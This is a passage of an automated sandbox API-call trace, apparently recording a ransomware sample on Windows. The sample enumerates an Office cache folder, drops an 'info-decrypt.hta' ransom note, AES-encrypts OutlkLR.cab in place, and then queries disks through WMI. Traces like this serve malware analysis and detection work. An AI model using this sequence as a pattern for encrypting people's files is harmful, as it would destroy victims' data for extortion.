lpFindFileData=0x6c0f314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0203.090] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0203.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0203.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0203.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0203.091] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0203.091] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0203.091] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0203.091] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.091] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0203.091] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0203.092] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0203.092] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0203.092] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0203.092] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0203.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0203.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0203.092] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0203.092] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0203.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0203.092] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0203.093] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0203.093] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0eef8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0203.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f3ec) returned 1 [0203.093] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0203.094] GetFileType (hFile=0x2f8) returned 0x1 [0203.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f3e8) returned 1 [0203.094] GetFileType (hFile=0x2f8) returned 0x1 [0203.094] WriteFile (in: hFile=0x2f8, lpBuffer=0x36cda48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6c0f4b0, lpOverlapped=0x0 | out: lpBuffer=0x36cda48*, lpNumberOfBytesWritten=0x6c0f4b0*=0x1000, lpOverlapped=0x0) returned 1 [0203.094] WriteFile (in: hFile=0x2f8, lpBuffer=0x36cda48*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6c0f484, lpOverlapped=0x0 | out: lpBuffer=0x36cda48*, lpNumberOfBytesWritten=0x6c0f484*=0x55e, lpOverlapped=0x0) returned 1 [0203.095] CloseHandle (hObject=0x2f8) returned 1 [0203.098] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0203.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0203.098] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), fInfoLevelId=0x0, lpFileInformation=0x36cea64 | out: lpFileInformation=0x36cea64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc)) returned 1 [0203.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0203.099] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0203.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0203.099] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f8 [0203.099] GetFileType (hFile=0x2f8) returned 0x1 [0203.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0203.099] GetFileType (hFile=0x2f8) returned 0x1 [0203.099] GetFileSize (in: hFile=0x2f8, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0xe21fcc [0203.099] ReadFile (in: hFile=0x2f8, lpBuffer=0x44d94b0, nNumberOfBytesToRead=0xe21fcc, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x44d94b0*, lpNumberOfBytesRead=0x6c0f4ec*=0xe21fcc, lpOverlapped=0x0) returned 1 [0204.372] CloseHandle (hObject=0x2f8) returned 1 [0204.372] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbe04f8) returned 1 [0204.374] CryptGenRandom (in: hProv=0xbe04f8, dwLen=0x10, pbBuffer=0x3608878 | out: pbBuffer=0x3608878) returned 1 [0204.530] CryptImportKey (in: hProv=0xbe04f8, pbData=0x370fbd8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f610) returned 1 [0204.530] CryptContextAddRef (hProv=0xbe04f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.530] CryptContextAddRef (hProv=0xbe04f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.530] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f790) returned 1 [0204.530] CryptContextAddRef (hProv=0xbe04f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.530] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x4, pbData=0x370fcb8*=0x1, dwFlags=0x0) returned 1 [0204.530] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x1, pbData=0x370fc84, dwFlags=0x0) returned 1 [0204.620] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2bdc1058*, pdwDataLen=0x6c0f4b8*=0xe21fd0, dwBufLen=0xe21fd0 | out: pbData=0x2bdc1058*, pdwDataLen=0x6c0f4b8*=0xe21fd0) returned 1 [0205.007] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3621d98*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x3621d98*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0205.009] CryptDestroyKey (hKey=0xb7f610) returned 1 [0205.009] CryptReleaseContext (hProv=0xbe04f8, dwFlags=0x0) returned 1 [0205.009] CryptReleaseContext (hProv=0xbe04f8, dwFlags=0x0) returned 1 [0205.009] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0205.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0205.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0205.011] GetFileType (hFile=0x4a8) returned 0x1 [0205.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0205.011] GetFileType (hFile=0x4a8) returned 0x1 [0205.011] WriteFile (in: hFile=0x4a8, lpBuffer=0x36223c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x36223c4*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0205.012] CloseHandle (hObject=0x4a8) returned 1 [0205.013] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0205.013] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.013] CoTaskMemFree (pv=0xbed438) [0205.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.013] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0205.013] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0205.014] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0205.014] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.015] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027180) returned 0x0 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0205.015] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027180, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030b70) returned 0x0 [0205.015] WbemDefPath:IUnknown:Release (This=0x6027180) returned 0x0 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030b70) returned 0x0 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0205.015] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0205.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ce458) returned 0x0 [0205.015] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce458, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.016] WbemDefPath:IUnknown:Release (This=0x66ce458) returned 0x3 [0205.016] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0205.016] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0205.016] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0205.016] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0205.016] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0205.016] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0205.016] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0205.016] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030b70) returned 0x0 [0205.016] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0205.016] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0205.016] WbemDefPath:IWbemPath:SetText (This=0x6030b70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0205.016] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0205.017] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.017] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0205.017] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0205.017] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0205.017] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.018] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60272a0) returned 0x0 [0205.018] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0205.018] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60308d0) returned 0x0 [0205.018] WbemDefPath:IUnknown:Release (This=0x60272a0) returned 0x0 [0205.018] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60308d0) returned 0x0 [0205.018] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 